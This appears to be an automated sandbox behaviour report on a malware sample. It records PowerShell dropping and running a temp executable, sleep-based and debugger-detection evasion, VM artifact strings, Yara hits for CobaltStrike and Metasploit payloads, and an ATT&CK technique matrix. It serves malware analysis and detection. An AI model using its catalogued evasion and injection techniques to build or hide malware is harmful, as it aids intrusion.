Static PE information: section name: .xdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7800BD pushad ; iretd		0_2_00007FFD9B7800C1
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Code function: 2_2_001D0128 push eax; ret		2_2_001D0364

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2988			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3228			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5956	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe TID: 4480	Thread sleep time: -340000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.5.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000ED000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.5.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.5.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.5.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.5.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.5.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.5.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.5.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Found API chain indicative of debugger detection

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep

graph_2-856

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Code function: 2_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,	2_2_00401180
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Code function: 2_2_00402F69 SetUnhandledExceptionFilter,	2_2_00402F69
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Code function: 2_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	2_2_00401A70
Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe	Code function: 2_2_004092E4 SetUnhandledExceptionFilter,	2_2_004092E4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Code function: 2_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,

2_2_00401630

Source: C:\Users\user\AppData\Local\Temp\tmpE651.exe

Code function: 2_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_00401990

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match

File source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Metasploit Payload

Source: Yara match

File source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	121 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Process Injection	LSASS Memory	211 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	111 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	121 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	22 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
